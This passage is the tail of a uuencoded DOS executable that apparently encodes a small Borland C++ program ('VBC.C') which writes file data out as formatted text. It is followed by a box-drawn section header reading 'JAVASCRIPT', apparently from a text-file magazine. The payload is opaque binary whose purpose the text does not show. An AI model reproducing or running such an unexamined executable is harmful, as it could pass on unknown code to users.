M_T[RZ,/\B_>+?OR+7OBX!0`C1OX]!0!U$XIF^X#\;W4-@W[R`'\%QT;R`0#K M&X#\>'0%@/Q8=1OY`2TN#;O("?07'1O(```-.\O=&_@(`=0SK!K`@Z'S\ M2SO9?_;W1OY``'0+L##H:_R*1OOH9?R+5O(+TGXG*\HKVB:*!#PM=`@\('0$ M/"MU!R:LZ$;\24N'RN,'L##H._SB^8?*XQ(KV2:L-H@%1_Y.['\#Z"[\XO`+ MVWX)B\NP(.@8_.+YZ5S\B78&BWX$]T;^(`!U`^G]_#;$/8-&!`2X4``J1NP# M1NXFB07W1OX0`'0'1T<FQP4``.DE_(MV\(Y&"(M^_+`EZ-'[)JP*P'7W@'[L M4'T#Z,O[!X-^Z@!T!;C__^L#BT;N'U]>B^5=P@P`Z0C3"!X)W@A,"5D)EPF> M":,)!PG,":H)K@FR"2<*R@IW"I<*#@Q"#$(,0@SY"/\(58OL5AZXI`*.V/]V M#/]V"I`.Z`4965F+\$!0_W8,_W8*_W8(_W8&D`[H4!"#Q`J+5@B+1@8#QA]> M7<NZN@/K`[J_`RZ.'E,"N04`M$"[`@#-(;DG`+K$`[1`S2'I-O4````````` M```````N.Q8FWCMJ.'@(`@SX"``!T!RZ,'@@-ZSB,V"X[!@8-=!6A"``N MHP@-'C/`4.BB`"Z.'@P-ZR,NBQ8['!@8-```NQP8(#0``+L<&"@T``"Z. M'@P-4C/`4.AV!(/$!,..VAZ.!@(`QP8"````C`8(`"X[%@8-="XF@SX"``!U M)J$``%L&)@$&``",P0/0CL(F@SX"``!U!R:)#@@`ZPHFB0X"`.L#Z%$`!XS` M)@,&``".V(,^`@``=`'#H0``)@$&``",P(S;`QX``([#)J,"`(S;.QX&`'09 MC@8&`(X>!`",!@8`)HP>!``NC!X*#8[;PR['!@H-``##+J$*#0O`="&,TYSZ MCM`VC@8&`#:,'@8`C!8$`([3G2:,'@0`C`8&`,,NC!X*#8P>!`",'@8`PU6+ M[%97+HP>#`V+5@@+TG0/+CL6"`UU!>BQ_NL#Z`__+HX>#`U?7EW+4"Z.'@PM,\!04.B]`X/$!"4/`'04NA``*]`SP"Z.'@P-4%+HI`.#Q`184#/;BMRQ!-/K MT^`NCAX,#5-0Z(L#@\0$6SW__W08+HD6!@TNB18(#8[:B1X``(D6`@"X!`## M,\"9PU`SVXK<L033Z]/@+HX>#`U34.A1`X/$!%L]__]T."4/`'48+HL."`TN MB18(#8[:B1X``(D.`@"X!`##4U+WV`40`#/;4U#H'0.#Q`1:6SW__W0#0NOM,\"9PXO:*08```,6``".VJ,``(D>`@"+V@,>``".VXD6`@"X!`##58OL,]*+ M1@;K"56+[(M6"(M&!HO("\I65RZ,'@P-=%X%$P"#T@!R0??"\/]U.[$$T^C3 MX@KB+HL6!@T+TG0@+HL6"@T+TG02B]J.VCD&``!S'(L6!@`[TW7PZ";_ZQ_H MO?[K&NAV_^L5,\"9ZQ!W].@C_HL>"`")'@(`N`0`+HX>#`U?7EW+4RZ+-@XM5BZ+-A`-5@[H<O^#Q`0+TG4"6\,?CL(&'E.+%@``_$J_!`"+][D&`/.E"])T M-XS`0([`C-A`CM@S_XOWB\J!^0`[email protected]`!#1X='AT>'SI8'J`!!V$(S`!0`0 MCL",V`4`$([8Z],NCAX,#0[H^_V#Q`1:N`0`PRX['@@-=$6+^P/XCL>+\2OP M)HDV```FB1X"``90CL,FHP``B],#T8[")H,^`@``=`<FB3X"`.L%)HD^"`"+ M\P[HL/V#Q`2+UK@$`,-3CL,FHP```]A3,\!0Z#@!@\0$6K@$`,-5B^PSTNL& M58OLBU8,BT8*BUX(5E<NC!X,#2Z)%@X-+J,0#0O;=#J+R`O*=#\%$P"#T@!R M0/?"\/]U.K$$T^C3X@KBCL,FBPX``#O(<@YW!XO3N`0`ZR'H0O_K'.C!_NL7 M4E`.Z#S^@\0$ZPQ34`[H'?V#Q`0SP)DNCAX,#5]>7<M5B^Q6'KBD`H[8BW8& M1KBD`H[`)BLV>P"#QC^Q!M/N.S;L`W4:N*0"BU8&BUX$CL`FB1:+`":)'HD` MN`$`ZVJQ!M/FN*0"CL`FBQZ/`+BD`HO6CL`F`Q9[`#O3=@N+TX[`)BL6>P"+ M\E:XI`*.P";_-GL`D`[HJ`)968O8@_O_=0N+QK$&T^BC[`/KF;BD`H[`)J%[ M``/#NJ0"CL(FHX\`)L<&C0```#/`'UY=P@0`58OL'KBD`H[8N*0"CL`FBQ:' M`":AA0"+3@:+7@3H/_1W)KBD`H[`)HL6CP`FH8T`BTX&BUX$Z";T<@W_=@;_ M=@3H#?\+P'4%N/__ZP(SP!]=PU6+[(/L"!ZXI`*.V+BD`H[`)J&+`#/2L03H M4?&[I`*.PR8#!HD`@](``T8$$U8&@_H/?`]_!3W__W8(NO__N/__ZW:XI`*. MP":+%HL`)J&)`(M.!HM>!.@T\8E6_HE&_+BD`H[`)HL6AP`FH84`BT[^BU[\ MZ);S=\*XI`*.P":+%H\`)J&-`(M._HM>_.A]\W*IN*0"CL`FH8L`)HL6B0") M1OJ)5OC_=O[_=OSH4/X+P'2(BU;ZBT;X'XOE7<-5B^P>N*0"CM@>Q58*M$2* M1@B+7@:+3@[-(1]R#(-^"`!U!(O"ZP;K!%#H`_$?7<LNC@93`B;_)@8$``"/ M!O0#CP;V`X\&^`,NC!XQ$XDV^@.)/OP#_(X&>P"^@``RY":L0(S%A]:3BS9U M`$9&N0$`@#Y]``-R$8X&=P"+_K%_,L#RKN-N@/%_4(O!`\-`)?[_B_PK^')< MB^<&'Q8'44GSI#+`JH[=A_*'V8O#B]!#Z!D`=P=R0N@2`'?Y/"!T"#P-=`0\ M"77H,L#KY`O`=`="J@K`=0%#AN`RP/GC%:Q)+")T#P0B/%QU!X`\(G4"K$D+ M]L.0D.E-[ED#RBZ.'C$3B1[N`T,#VP/;B_2+["OK<N*+Y8DN\`.,%O(#XQ&) M=@",5@*#Q00VK`K`X/IT[3/`B48`B48"+HX>,1.+-OH#BS[\`_\V^`/_-O8# MH>X#HVL`H?(#HV\`H?`#HVT`_R;T`U6+[!ZXI`*.V+1*BUX(CD8&S2%R!;C_ M_^L&4U#HL.]8'UW+58OL'KBD`H[8'HM.#+1#BD8*Q58&S2$?<@.1ZP10Z(OO M'UW+58OL'KBD`H[8BU8&N*0"CL`F.1:P`G<)N`8`4.AI[^L7B]K1X[BD`H[` M)L>'L@(``%*0#N@$`%D?7<M5B^P>N*0"CMBT/HM>!LTA<A+1X[BD`H[`)L>' ML@(``#/`ZP10Z"7O'UW+58OL@^P$'KBD`H[8N*0"CL`FH;`".T8&=P:X!@!0 MZV&+7@;1X[BD`H[`)O>'L@(``G0%N`$`ZTRX`$2+7@;-(7(^]L*`=36X`4(S MR8O1S2%R+E)0N`)",\F+T<TAB4;\B5;^6EER&;@`0LTA<A([5OYR"7<%.T;\ M<@+KMS/`ZP10Z)[N'XOE7<M5B^Q6'KBD`H[8OO__Q%X&)HM'$CM&!G0#Z9`` MQ%X&)H-_!@!T+R:#/P!]#_]V"%.0#NA]`%E9"\!U<<1>!B;W1P($`'0/)O]W M"B;_=PB0#NAE^%E9Q%X&)H!_!`!\#B:*1P284)`.Z*?^68OPQ%X&)L='`@`` M)L='!@``)L<'```FQD<$_R:#?Q``=!\SP%!04%`F_W<0Z%SO4E"0#NB.\5E9 MQ%X&)L='$```B\8?7EW+58OL5AZXI`*.V(M&!@M&"'4(D`[HO0#IM`#$7@8F MBT<2.T8&=`:X___II`#$7@8F@S\`?%$F]T<""`!U&":+1PZ+5@:#P@4[1@AT M`^E_`"8Y5PQU><1>!B;'!P``)HM'#HM6!H/"!3M&"'5B)CE7#'5<)HM'"B:+ M5P@FB4<.)HE7#.M*ZTC$7@8FBT<&)@,'0(OP)BDW4":+1PHFBU<()HE'#B:) M5PQ04B:*1P284)`.Z/,.@\0(.\9T$\1>!B;W1P(``G4()H-/`A#I6/\SP!]> M7<M5B^R#[`165QZXI`*.V#/_N*0"CL`FBS:P`L=&_J0"QT;\(`'K&\1>_";W M1P(#`'0,_W;^4Y`.Z/+^65E'@T;\%(O&3@O`==Z+QQ]?7HOE7<M5B^Q65QZX MI`*.V#/_Q%X,_T8,)HH/BL$\<G4(N@$`O@$`ZQ^`^7=U!;H"`^L(@/EA=0NZ M`@F_@`"^`@#K!3/`Z8<`Q%X,)HH/_T8,@/DK=!/$7@PF@#\K=2&`^71T!8#Y M8G47@/DK=0;$7@PFB@^#XOR#R@2_@`&^`P"`^71U!H'*`$#K(X#Y8G4&@<H` [email protected]*0"CL`FH=H")0#`"]"+PJD`@'0#@\Y`N*0"CL`FQP8:`0``)L<&&`&D M)\1>"":)%\1>!":)/XO&'U]>7<(,`%6+[(/L!!ZXI`*.V/]V"/]V!A:-1OY0 M%HU&_%#H$/_$7@XFB4<""\!T*B:`?P0`?3?_=OR+1OX+1@10_W8,_W8*D`[H M"06#Q`C$7@XFB$<$"L!]%,1>#B;&1P3_)L='`@``,](SP.MGQ%X.)HI'!)A0 MD`[HVNM9"\!T"<1>#B:!3P(``K@``E#$7@XF]T<"``)T!;@!`.L",\!0,\!0 M4/]V$/]V#I`.Z'0+@\0,"\!T#_]V$/]V#I`.Z)S\65GKHL1>#B;'1Q```(M6 M$(M&#A^+Y5W"#@!5B^R#[`0>N*0"CMC'1OZD`L=&_"`!Q%[\)H!_!`!\'HM& M_(-&_!2ZI`*.PE`FH;`"NA0`]^H%(`%:.]!RV,1>_":`?P0`?`8STC/`ZP:+ M5OZ+1OP?B^5=PU6+[(/L!!ZXI`*.V.B8_XE6_HE&_`O"=08STC/`ZQC_=O[_ M=OS_=@C_=@;_=@S_=@HSP%#HFOX?B^5=RU6+[!ZXI`*.V+A3(5#_=@C_=@;_ M=@S_=@J-1@Y0Z#/N'UW+58OL@^P$5AZXI`*.V,1>!":#/P!]#":+3P8F`P]! MB_'K#\1>!":+!YDSPBO"B\B+\,1>!";W1P)``'5#Q%X$)HM'#B:+5PR)1OZ) M5OPF@S\`?27K#?]._,1>_":`/PIU`4:+P4D+P'7LZQ3$7OS_1OPF@#\*=0%& MB\%)"\!U[(O&'UZ+Y5W"!`!5B^Q6'KBD`H[8BW8._W8(_W8&D`[HV_M960O` M=`6X___K8(/^`747Q%X&)H,_`'X._W8(4^@__YDI1@H95@S$7@8F@6<"7_XF MQP<``":+1PHFBU<()HE'#B:)5PQ6_W8,_W8*)HI'!)A0D`[HDNJ#Q`B#^O]U M"CW__W4%N/__ZP(SP!]>7<M5B^R#[`0>N*0"CMC$7@8FBD<$F%"0#NBP[%F) M5OZ)1OR#^O]U!3W__W0IQ%X&)H,_`'T0_W8(4^BU_ID!1OP15O[K$/]V"/]V M!NBC_IDI1OP95OZ+5OZ+1OP?B^5=RU6+[(/L!%8>N*0"CMB^%`#'1OZD`L=& M_"`!ZQ[$7OPFBT<")0`#/0`#=0O_=OY3D`[HV?I968-&_!2+QDX+P'7;'UZ+ MY5W#58OL'KBD`H[8Q%X$)O='`@`"=`/HHO_$7@0F_W<&)HM'"B:+5P@FB4<. M)HE7#%!2)HI'!)A0D`[HL`>#Q`C$7@0FB0<+P'X))H-G`M\SP.LIQ%X$)H,_ M`'40)HM'`B5__@T@`":)1P+K#<1>!";'!P``)H-/`A"X__\?7<($`%6+[!ZX MI`*.V,1>!B;_!_]V"%,.Z`@`65D?7<M8#E!5B^Q6'KBD`H[8BT8&"T8(=0:X M___IV0#$7@8F@S\`?AK$7@8F_P\FBT<.)HMW#";_1PR.P":*!.FT`,1>!B:# M/P!\;R;W1P(0`75G)O='`@$`=%_$7@8F@4\"@``F@W\&`'0/_W8(4^CW_@O` M=++KH>NNQ%X&)O='`@`"=`/HFOZX`0!0'K@T!%#$7@8FBD<$F%"0#NBU!H/$ M"`O`=3/$7@8FBD<$F%"0#NA`^%D]`0!T"\1>!B:#3P(0Z53_Q%X&)HM'`B5_ M_@T@`":)1P+I0/^`/C0$#74+Q%X&)O='`D``=(_$7@8F@V<"WZ`T!+0`'UY= MRQZXI`*.V+BD`E"X(`%0#NCY_EE9'\M5B^Q65QZXI`*.V,1^!L5V"HM.#M'I M_/.E<P&DBU8(BT8&'U]>7<M5B^P>N*0"CM@>BTX$M#S%5@;-(1]R`NL$4.C` MYA]=P@8`58OL'KBD`H[8BUX$*\DKTK1`S2$?7<("`%6+[(/L!%97'KBD`H[8 MBW8*BWX,]\8`P'4.N*0"CL`FH=H")0#`"_`SP%#_=@C_=@:0#NC`]H/$!HE& M_O?&``%U`^F/`+BD`H[`)B,^W`*+QZF``74'N`$`4.A%YH-^_O]U++BD`H[` M)H,^W@("=`V.P";_-MX"Z"CFZ0T!]\>``'0$,\#K`[@!`(E&_NL,]\8`!'0_ MN%``4.O<]\;P`'0>_W8(_W8&,\!0Z!C_B_@+P'T#Z=(`5Y`.Z)GV6>L5_W8( M_W8&_W;^Z/K^B_@+P'U^Z;0`5O]V"/]V!I`.Z+$`@\0&B_@+P'QF,\!05Y`. MZ(#T65F)1ORI@`!T(X'.`"#WQ@"`=",E_P`-(``STE)0N`$`4%>0#NA8](/$ M".L*]\8``G0$5^B^_O=&_@$`=!_WQ@`!=!GWQO``=!.X`0!04/]V"/]V!I`. MZ*KU@\0("_]\-??&``-T!;@`$.L",\"+UH'B__@+T%+W1OX!`'0$,\#K`[@` M`5H+T(O?T>.XI`*.P":)E[("B\<?7UZ+Y5W+58OL@^P"'KBD`H[8L`&+3@KW MP0(`=0JP`O?!!`!U`K``'L56!K'P(DX*"L&T/<TA'W(@B4;^BT8*)?^X#0"` MBU[^T>.ZI`*.PB:)A[("BT;^ZP10Z+KD'XOE7<M5B^P>N*0"CMC$7@@F_P__ M=@I3BD8&F%"0#N@&`(/$!A]=RU6+[%8>N*0"CMB*1@:B`03$7@@F@S__?50F M_P<FBT<.)HMW#";_1PR*%@$$CL`FB!2.1@HF]T<""`!U`^E8`8`^`00*=`J` M/@$$#70#Z4<!_W8*_W8(D`[H4/9960O`=0/I,P&X___I,@'I*@'$7@@F]T<" MD`!U"";W1P("`'4*Q%X()H-/`A#KVL1>"":!3P(``2:#?P8`=&\F@S\`=`__ M=@I3D`[H`O9960O`=;7$7@@FBT<&]]@FB0<FBT<.)HMW#";_1PR*%@$$CL`F MB!2.1@HF]T<""`!U`^FY`(`^`00*=`J`/@$$#70#Z:@`_W8*_W8(D`[HL?59 M60O`=0/IE`#I7O_IC@#$7@@FBD<$F-'@NJ0"B]B.PB;WA[("``AT&;@"`%`S MP%!0Q%X()HI'!)A0D`[[email protected]#Q`B`/@$$"G4GQ%X()O='`D``=1RX`0!0'K@` M!%`FBD<$F%"0#NA>!H/$"#T!`'4?N`$`4!ZX`010Q%X()HI'!)A0D`[H/P:# MQ`@]`0!T#L1>"";W1P(``G4#Z>G^H`$$M``?7EW+58OL'KBD`H[8N*0"4+@T M`5#[email protected]$C^@\0&'UW+58OL@^P"5E<>N*0"CMB+?@B)?O[$7@0F]T<""`!T M+NLB_W8&_W8$Q%X*_T8*)HH'F%`.Z`S^@\0&/?__=04SP.G&`8O'3PO`==?I MN0'$7@0F]T<"0`!U`^DP`2:#?P8`=0/ISP`F.7\&<VTF@S\`=`__=@93D`[H M<_1960O`=;[$7@0FBD<$F-'@NJ0"B]B.PB;WA[("``AT&;@"`%`SP%!0Q%X$ M)HI'!)A0D`[H2^.#Q`A7_W8,_W8*Q%X$)HI'!)A0D`[H.@6#Q`@[QW(#Z30! MZ6G_Z2X!Q%X$)HL'`\=\)B:#/P!U#+C__R8K1P8FB0?K%/]V!O]V!)`.Z.[S M65D+P'0#Z3;_5_]V#/]V"L1>!";_=PXF_W<,D`[HL?J#Q`K$7@0FBP<#QR:) M!R8!?PSIT@#$7@0FBD<$F-'@NJ0"B]B.PB;WA[("``AT&;@"`%`SP%!0Q%X$ M)HI'!)A0D`[HE^*#Q`A7_W8,_W8*Q%X$)HI'!)A0D`[HA@2#Q`@[QW(#Z8`` MZ;7^ZWO$7@0F@W\&`'12ZT?$7@0F_P=](":+1PXFBW<,)O]'#,1>"O]&"B:* M%X[`)H@4BL*T`.L7_W8&_W8$Q%X*_T8*)HH'4`[H3/R#Q`8]__]U`^E@_HO' M3PO`=;+K'U?_=@S_=@K$7@0FBD<$F%"0#NB8`H/$"#O'<P/I./Z+1OX?7UZ+ MY5W""@!5B^R#[`165QZXI`*.V+BD`H[`)J&P`CM&!G<*N`8`4.B?X.G"`(M& M#$`]`@!R$XM>!M'CN*0"CL`F]X>R`@`"=`4SP.FA`/]V#/]V"O]V"/]V!I`. MZ*KB@\0(B4;^0#T"`'(3BUX&T>.XI`*.P";WA[("`$!U!8M&_NMLBT[^Q'8( MB_Z+WOPFK#P:=#`\#70%JN+SZQ_B[P93N`$`4(U&_190_W8&D`[H5^*#Q`A; M!_R*1OVJ._MU`NN,ZRA3N`$`4/?9&\!04?]V!I`.Z!GA@\0(BUX&T>.XI`*. MP":!C[("``);*_N7'U]>B^5=RU6+[%97'KBD`H[8BWX.BW80Q%X&)HM'$CM& M!G4+@_\"?P:!_O]_=@:X___I]@"#/@0$`'4/@7X&-`%U",<&!`0!`.L4@SX" M!`!U#8%^!B`!=0;'!@($`0#$7@8F@S\`=!2X`0!0,\!04/]V"%.0#NB']8/$ M"L1>!B;W1P($`'0/)O]W"B;_=PB0#NAEZ5E9Q%X&)H-G`O,FQT<&``"+1@B+ M5@:#P@4FB4<*)HE7"":)1PXFB5<,@_\"=&<+]G9CN*0"CL`FQP86`0``)L<& M%`'L)XM&"@M&#'4A5I`.Z!SJ68E6#(E&"@O"=0/I.O_$7@8F@T\"!.L#Z2W_ MQ%X&BT8,BU8*)HE'#B:)5PPFB4<*)HE7"":)=P:#_P%U!2:#3P((,\`?7UY= MRU6+[%97'KBD`H[8_,1^!HO7,L"Y___RK@:-=?_$?@JY___RKO?1*_D&'P>' M]_?&`0!T`J1)T>GSI7,!I)*,PA]?7EW+58OL5QZXI`*.V,1^!C/`.T8(=00[ MQW0*_+G___*ND??02!]?7<M5B^R![(X`5E<>N*0"CMB+?@:XI`*.P"8Y/K`" M=PJX!@!0Z!O>Z3\!BT8,0#T"`',%,\#I,0&+W]'CN*0"CL`F]X>R`@`(=!&X M`@!0,\!04%>0#N@1WX/$"(O?T>.XI`*.P";WA[("`$!U%?]V#/]V"O]V"%>0 M#NCT`(/$".GG`(O?T>.XI`*.P":!I[("__V+1@J+5@B)1O:)5O2+1@R)1OKK M=?].^L1>]/]&]":*!XA&^3P*=0K$7OPFQ@<-_T;\Q%[\BD;Y)H@'_T;\C89R M_XM6_#/;*]"#VP`+VWQ$=0:!^H``<CR-AG+_BW;\,](K\(/:`%864%>0#NAP M`(/$"(O0.\9T$H/Z_W4%N/__ZU&+1@PK1OKK18V&<O^,5OZ)1OR#?OH`=`/I M>/^-AG+_BW;\,](K\(/:`(O&"\!V)%86C89R_U!7D`[H(0"#Q`B+T#O&=`Z# M^O]TL8M&#`/"*\;K`XM&#!]?7HOE7<M5B^P>N*0"CMB+7@;1X[BD`H[`)O>' ML@(!`'0&N`4`4.LG'K1`BUX&BTX,Q58(S2$?<A50BUX&T>.XI`*.P":!C[(" M`!!8ZP10Z(;<'UW+58OL@^P$5AZXI`*.V#/VQT;^I`+'1OP@`>L;Q%[\)O=' M`@,`=`O_=OY3D`[HN^U968-&_!1&N*0"CL`F.3:P`G?9'UZ+Y5W+58OL@^P$ M5AZXI`*.V+X$`,=&_J0"QT;\(`'K&\1>_";W1P(#`'0+_W;^4Y`.Z"3N65E. M@T;\%`OV=>$?7HOE7<M5B^R#[!P>N*$"CMC'1NX``,=&[```QT;J``#'1N@` M`,=&Y@``QT;D```>N```4,1>"";_=P8F_W<$FF49``"#Q`B)5O*)1O#$7@@F MBT<&)HM7!(E&_HE6_/]V_O]V_)K!)0``65E(Q%[\`]@FQ@=?'K@#`%#_=O[_ M=OR:91D``(/$"(E6]HE&]/]V[O]V[!ZX!@!0_W;V_W;TFJ$9``"#Q`R#1NP! M@U;N`.G>`/]V\O]V\)H8'```65F9B5;ZB4;X@W[X9'(;_W;Z_W;X'K@/`%#_ M=O;_=O2:H1D``(/$#.M,@W[X"G(A@W[X8W<;_W;Z_W;X'K@2`%#_=O;_=O2: MH1D``(/$#.LE@W[X`'(?@W[X"7<9_W;Z_W;X'K@6`%#_=O;_=O2:H1D``(/$ M#(-&Z`NH`QT;F``#'1N0!`(-^Z@!\174&@W[H%'(]_W;N_W;LN`H`4+@M`%`>N!L`4/]V]O]V])JA&0``@\00@T;L`8-6[@#'1NH``,=&Z```QT;F``#' M1N0``,1>\";W1P(@`'4#Z13_@W[F`'4A@W[D`74;N`H`4+@-`%`>N"D`4/]V M]O]V])JA&0``@\0,_W;R_W;PFHX5``!96?]V]O]V])J.%0``65D?B^5=RP`` M``!R8@!W8@!#*"5L9"D](@`E9``P)60`,#`E9``B)6,E8T,H)6QD*3TB`"(E M8R5C````````0F]R;&%N9"!#*RL@+2!#;W!Y<FEG:'0@,3DY,2!";W)L86YD M($EN=&PN`$1I=FED92!E<G)O<@T*06)N;W)M86P@<')O9W)A;2!T97)M:6YA M=&EO;@T*```````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M``````````````#6`@``U@(``-8"``````D"```````````````````@`0`` M"@(!`````````````````#0!```"`@(`````````````````2`$``$,"`P`` M``````````````!<`0``0@($`````````````````'`!```````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M````````````````````````%``!8`)@`F`$H`*@```````````````````` M`````````````````````$#__P```!,"`@0%!@@("!05!1/_%@41`O______ M__________\%!?____________________\/_R,"_P______$___`@(%#P+_ M__\3__________\C_____R/_$_\``````````````````%1-4``N)"0D```0 M*&YU;&PI```4%`$4%104%!0"`!0#!!0)!04%!04%!04%%!04%!04%!04%!0/ M%P\(%!04!Q06%!04%!04%!04#104%!04%!04%!00"@\/#P@*%!0&%!(+#A04 M$10,%!0-%!04%!04%`!P<FEN="!S8V%N9B`Z(&9L;V%T:6YG('!O:6YT(&9O M<FUA=',@;F]T(&QI;FME9`T*````````````````````````````#0`````` MX@SG#.<,YPP``J,&````$#,3```````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````/M2$`/_!```E@`C``H`BP!_``$````"`!4` M`0`!``$`X#(````````!```````@`````````````````!0`]08````````` M`````````````0```$(!`````@```%4!`````P```%8!````!````*L!```` M!0```#P"````!@```%,"````!P```%4"````"````%<"````"0```(L"```` M"@```+("````"P```$\#````#````&4#````#0```'X#````#@```),#```` M#P```*8#````$````*D#````$0```*D#````$@```,<#````$P```,H#```` M%````,H#````%0```/8#````%@```/D#````%P```/D#````&````"<$```` M&0```&T$````&@```(8$````&P```)X$````'````"<%````'0```$X%```` M'@```(0%````'P```.@%````(````$8&````(0```&<&````(@```*,&```` M(P```)X'````)````+T'````)0```/0'````)@```*<,````)P````8-```` M*`````@-````*0````H-````*@```$8.````*P```$8.````+````%`/```` M+0```%H/````+@```+<0````+P```+X0````,````.<1````,0```#D2```` M,@```/<2````,P```"<3````-````%@4````-0```'L4````-@```)\4```` M-P```-H4````.`````45````.0`B`(X5````.@```$`6````.P```!07```` M/````#88````/0````P9````/@`@`&49````/P`?`*$9````0````$T:```` M00```-0:````0@```/D;````0P```!4<````1``A`!@<````10````T=```` M1@```",=````1P```(4=````2````!8?````20```'(?````2@```)4?```` M2P```#4A````3````%,A````30```&4C````3@```%0D````3P```'TE```` M4``>`,$E````40```.<E````4@```%4G````4P```*0G````5````.PG```` M50`C``T`@@(85@``````I`(`5P```%L`I`(`6````%\`I`(`60```&,`I`(` M6@```&<`I`(`6P```&L`I`(`7````&T`I`(`70```'$`I`(`7@```'4`I`(` M7P```'<`I`(`8````'D`I`(`80```'L`I`(`8@```'T`I`(`8P```'T`I`(` M9````'T`I`(`90```'X`I`(`9@```'\`I`(`9P```($`I`(`:````(4`I`(` M:0```(D`I`(`:@```(T`I`(`:P```)(`I`(`;````)0`I`(`;0```!0!I`(` M;@```!@!I`(`;P```!P!I`(`<````"`!I`(`<0```+`"I`(`<@```+("I`(` M<P```-H"I`(`=````-P"I`(`=0```-X"I`(`=@```.`"I`(`=P```%`#I`(` M>````.X#I`(`>0```/`#I`(`>@````8$I`(`>P````@$I`(`?``=```````% M?0`````````%?@````P````%?P`````0```%@@`&`.3_```"@P`&`.C_```" MA``&`.S_```"A0`8`/#_```"A@`8`/3_```"AP`;`/C_```"B``;`/S_```" MB0`$``8````*B@`<``@````*BP`9```````&C``&```````&C0`*```````& M@0`!#8D``P`!``$``0`!`(``R%M:)@0`#0`+`!D`#0`W``X`50`/`&8`$`!] M`!$`E@`2`*\`%0"Z`!8`S@`7`.\`&``6`1D`.P$:`$T!'`!;`1T`?`$3`)@! M(`"F`2$`S0$B`-H!(P#G`0``````````#0#?`8``"0`!````&0#3`0$`@@(M`-\!`0`"``$``0`!``$``0`5````````````!````0```@"`____?P````4` M``(```0``(#___]_```&```$```&`````(#___]_"````0``"```````_P`` M``D```(```H``````/__```*```$```,``````#_____#0``!``````/```( M`````!````H`````#@``!@`````H```!``````P```$``!,``````/\````' M```(``````L```@`````*P``"@`````6```$```9`!X``!0```$`%@``!``` M"``6```$```"`!8```0``!L`(P`````%!``C``````0*`",`````A`0`(P`` M```$&``C``````0$`",`````!`0`(P`````$`0``C@`$``"/``H``)```@`` MD0`(``"2``0``),`&@``E``:``"5``H``)8`!`#`%`````$`#0`9`+H`U`#O M`/4`^P`6`1P!(@$[`5,!50%;`9@!I@&L`;(!S0'G`0````!?7V-L96%N=7`` M7U]C:&5C:VYU;&P`7U]T97)M:6YA=&4`7U]R97-T;W)E>F5R;P!?86)O<G0` M1$=23U500`!?7TU-3T1%3`!?871E>&ET`%]?9&]S7V=E=&9I;&5A='1R`%]? M9&]S7W-E=&9I;&5A='1R`%]E>&ET`%]?97AI=`!?7V-E>&ET`%]?8U]E>&ET M`$Y?3%A,4TA``$Q83%-(0`!&7TQ83%-(0`!.7U!!1$1``$9?4$%$1$``4$%$ M1$``3E]04U5"0`!&7U!354)``%!354)``%]?24]%4E)/4@!?7T1/4T524D]2 M`%]I<V%T='D`7U],3TY'5$]!`%]?551/00!?;'-E96L`7U]-2TY!344`7U]4 M35!.04T`3E]00TU00`!?7W)E860`7U]S971U<&EO`%]T96QL`%]U;FQI;FL` M7U]64%))3E1%4@!?7W-T<&-P>0!?7U]F:7)S=`!?7U]L87-T`%]?7W)O=F5R M`%]F<F5E`%]F87)F<F5E`%]M86QL;V,`7V9A<FUA;&QO8P!?<F5A;&QO8P!? M9F%R<F5A;&QO8P!?7V)R:P!?7W-B<FL`7VEO8W1L`%]?4D5!3$-65`!?<V5T M8FQO8VL`7U]C:&UO9`!?8VQO<V4`7U]C;&]S90!?96]F`%]F8VQO<V4`7V9F M;'5S:`!?9FQU<VAA;&P`7U]/4$5.1E``7U]'151&4`!?9F]P96X`7V9P<FEN M=&8`7V9S965K`%]F=&5L;`!?7V9G971C`%]?3F9G971C`%]F9V5T8P!?9F=E M=&-H87(`7VUE;6-P>0!?;W!E;@!?7V]P96X`7U]F<'5T8P!?9G!U=&,`7V9P M=71C:&%R`%]?1E!55$X`7U]?<F5A9`!?<V5T=F)U9@!?<W1R8V%T`%]S=')L M96X`7U]?=W)I=&4`7U]W<FET90!?7WAF8VQO<V4`7U]X9F9L=7-H`%]M86EN M`$1!5$%314=``%]?26YT,%9E8W1O<@!?7TEN=#1696-T;W(`7U]);G0U5F5C M=&]R`%]?26YT-E9E8W1O<@!?7T,P87)G8P!?7T,P87)G=@!?7T,P96YV:7)O M;@!?7V5N=DQN9P!?7V5N=G-E9P!?7V5N=E-I>F4`7U]P<W``7U]O<W9E<G-I M;VX`7U]O<VUA:F]R`%]?=F5R<VEO;@!?7V]S;6EN;W(`7V5R<FYO`%]?4W1A M<G14:6UE`%]?:&5A<&)A<V4`7U]B<FML=FP`7U]H96%P=&]P`%]?871E>&ET M8VYT`%]?871E>&ET=&)L`%]?97AI=&)U9@!?7V5X:71F;W!E;@!?7V5X:71O M<&5N`%]?<W1R96%M<P!?7VYF:6QE`%]?;W!E;F9D`%]?9FUO9&4`7U]N;W15 M;6%S:P!?7V1O<V5R<FYO`%]?9&]S17)R;W)4;U-6`%]?<W1K;&5N`%]?87)G M8P!?7V%R9W8`7U]296%L0W9T5F5C=&]R`%]?4V-A;E1O9%9E8W1O<@!?7W-E M=&%R9W9?7P!?7V-V=&9A:P!?7T%(4TA)1E0`7U]!2$E.0U(`5D)#+D,`5D)# M`&8`:0!K`&QE9V=I`&%P<FD`=P!P`&X`9FEL90!&24Q%`&9P;W-?=`!S:7IE M7W0`;&5V96P`9FQA9W,`9F0`:&]L9`!B<VEZ90!B=69F97(`8W5R<`!I<W1E );7``=&]K96X` ` end sum -r/size 41569/16164 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ JAVASCRIPT ³º 